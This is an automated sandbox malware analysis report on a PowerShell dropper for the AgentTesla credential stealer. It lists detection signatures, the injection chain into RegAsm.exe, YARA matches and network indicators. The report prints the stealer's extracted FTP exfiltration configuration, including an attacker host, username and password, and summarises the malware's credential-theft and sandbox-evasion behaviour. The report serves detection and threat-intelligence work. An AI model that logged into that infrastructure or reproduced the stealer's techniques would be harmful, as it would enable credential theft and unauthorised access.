Edit tour

Windows Analysis Report
7dtpow.ps1

Overview

General Information

Sample name:	7dtpow.ps1
Analysis ID:	1586042
MD5:	5c540d4108cce10839d48d7a8ba97c11
SHA1:	cf410d7dfe50cbebec376464968a1a6035f778f1
SHA256:	65808985955d6c5df16a4679a0fca5437ab7b2a07eb55c240de1b8d22ae3b8c3
Tags:	ps1user-malrpt
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

AI detected suspicious sample

Allocates memory in foreign processes

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

PE file contains section with special chars

PE file has nameless sections

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Suspicious execution chain found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6192 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 1992 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 10454890A3D7C7C0B7EC0BF7018141E4)

RegAsm.exe (PID: 1436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WMIADAP.exe (PID: 1992 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4515067403.000000000280F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 6192	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1afda7:$b1: ::WriteAllBytes( 0x313048:$b1: ::WriteAllBytes( 0x1afdc3:$b2: ::FromBase64String( 0x313064:$b2: ::FromBase64String( 0x217a0:$s1: -join 0x266cb:$s1: -join 0x79b37:$s1: -join 0x86db8:$s1: -join 0x8a27a:$s1: -join 0x8a914:$s1: -join 0x8c410:$s1: -join 0x8e664:$s1: -join 0x8ee8b:$s1: -join 0x8f6e6:$s1: -join 0x8fe21:$s1: -join 0x8fe53:$s1: -join 0x8fe9b:$s1: -join 0x8feba:$s1: -join 0x9070b:$s1: -join 0x90887:$s1: -join 0x908ff:$s1: -join
Process Memory Space: x.exe PID: 1992	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: x.exe PID: 1992	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 1436	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1436	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.x.exe.4617600.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.x.exe.4617600.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.x.exe.4617600.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32935:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x329a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32a31:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32ac3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32b2d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32b9f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32c35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32cc5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.x.exe.4617600.1.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2fb6b:$s2: GetPrivateProfileString 0x2f218:$s3: get_OSFullName 0x30906:$s5: remove_Key 0x30ab3:$s5: remove_Key 0x31995:$s6: FtpWebRequest 0x32917:$s7: logins 0x32e89:$s7: logins 0x35b8e:$s7: logins 0x35c4c:$s7: logins 0x375a1:$s7: logins 0x367e6:$s9: 1.85 (Hash, version 2, native byte-order)
3.2.x.exe.45db7d8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.x.exe.45db7d8.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.x.exe.45db7d8.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32935:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x329a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32a31:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32ac3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32b2d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32b9f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32c35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32cc5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.x.exe.45db7d8.2.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2fb6b:$s2: GetPrivateProfileString 0x2f218:$s3: get_OSFullName 0x30906:$s5: remove_Key 0x30ab3:$s5: remove_Key 0x31995:$s6: FtpWebRequest 0x32917:$s7: logins 0x32e89:$s7: logins 0x35b8e:$s7: logins 0x35c4c:$s7: logins 0x375a1:$s7: logins 0x367e6:$s9: 1.85 (Hash, version 2, native byte-order)
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x34717:$s7: logins 0x34c89:$s7: logins 0x3798e:$s7: logins 0x37a4c:$s7: logins 0x393a1:$s7: logins 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
3.2.x.exe.4653420.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.x.exe.4653420.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.x.exe.4653420.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32935:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x329a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32a31:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32ac3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32b2d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32b9f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32c35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32cc5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.x.exe.4653420.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2fb6b:$s2: GetPrivateProfileString 0x2f218:$s3: get_OSFullName 0x30906:$s5: remove_Key 0x30ab3:$s5: remove_Key 0x31995:$s6: FtpWebRequest 0x32917:$s7: logins 0x32e89:$s7: logins 0x35b8e:$s7: logins 0x35c4c:$s7: logins 0x375a1:$s7: logins 0x367e6:$s9: 1.85 (Hash, version 2, native byte-order)
3.2.x.exe.4653420.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.x.exe.4653420.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.x.exe.4653420.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.x.exe.4653420.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x70355:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x703c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x70451:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x704e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x7054d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x705bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x70655:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x706e5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.x.exe.4653420.0.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x6d58b:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x6cc38:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x6e326:$s5: remove_Key 0x6e4d3:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x6f3b5:$s6: FtpWebRequest 0x34717:$s7: logins 0x34c89:$s7: logins 0x3798e:$s7: logins 0x37a4c:$s7: logins 0x393a1:$s7: logins 0x70337:$s7: logins 0x708a9:$s7: logins 0x735ae:$s7: logins 0x7366c:$s7: logins 0x74fc1:$s7: logins 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
3.2.x.exe.4617600.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.x.exe.4617600.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.x.exe.4617600.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.x.exe.4617600.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x70555:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xac175:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x705c7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xac1e7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x70651:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xac271:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x706e3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xac303:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x7074d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xac36d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x707bf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xac3df:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x70855:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xac475:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
3.2.x.exe.4617600.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x6d78b:$s2: GetPrivateProfileString 0xa93ab:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x6ce38:$s3: get_OSFullName 0xa8a58:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x6e526:$s5: remove_Key 0x6e6d3:$s5: remove_Key 0xaa146:$s5: remove_Key 0xaa2f3:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x6f5b5:$s6: FtpWebRequest 0xab1d5:$s6: FtpWebRequest 0x34717:$s7: logins 0x34c89:$s7: logins 0x3798e:$s7: logins 0x37a4c:$s7: logins 0x393a1:$s7: logins 0x70537:$s7: logins
3.2.x.exe.45db7d8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.x.exe.45db7d8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.x.exe.45db7d8.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.x.exe.45db7d8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x7055d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xac37d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xe7f9d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x705cf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xac3ef:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xe800f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x70659:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xac479:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xe8099:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x706eb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xac50b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xe812b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x70755:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xac575:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xe8195:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
3.2.x.exe.45db7d8.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x6d793:$s2: GetPrivateProfileString 0xa95b3:$s2: GetPrivateProfileString 0xe51d3:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x6ce40:$s3: get_OSFullName 0xa8c60:$s3: get_OSFullName 0xe4880:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x6e52e:$s5: remove_Key 0x6e6db:$s5: remove_Key 0xaa34e:$s5: remove_Key 0xaa4fb:$s5: remove_Key 0xe5f6e:$s5: remove_Key 0xe611b:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x6f5bd:$s6: FtpWebRequest 0xab3dd:$s6: FtpWebRequest 0xe6ffd:$s6: FtpWebRequest 0x34717:$s7: logins
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1", ProcessId: 6192, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1", ProcessId: 6192, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 3.2.x.exe.45db7d8.2.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: 7dtpow.ps1

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Joe Sandbox ML: detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4653420.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.4617600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.45db7d8.2.raw.unpack, type: UNPACKEDPE

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.241.62.63 162.241.62.63

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: ftp.antoniomayol.com

Source: RegAsm.exe, 00000004.00000002.4515067403.000000000280F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://antoniomayol.com
Source: RegAsm.exe, 00000004.00000002.4515067403.000000000280F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.antoniomayol.com
Source: RegAsm.exe, 00000004.00000002.4515067403.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: x.exe, 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4515067403.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000000.00000002.2070632529.0000024A92A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101310896.0000024AA28BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2070632529.0000024A93C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107437802.0000024AAA99A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2070632529.0000024A92841000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4515067403.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2070632529.0000024A9397E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.2070632529.0000024A93C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107437802.0000024AAA99A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2108900254.0000024AAAC56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co?
Source: x.exe, 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000000.00000002.2070632529.0000024A92841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
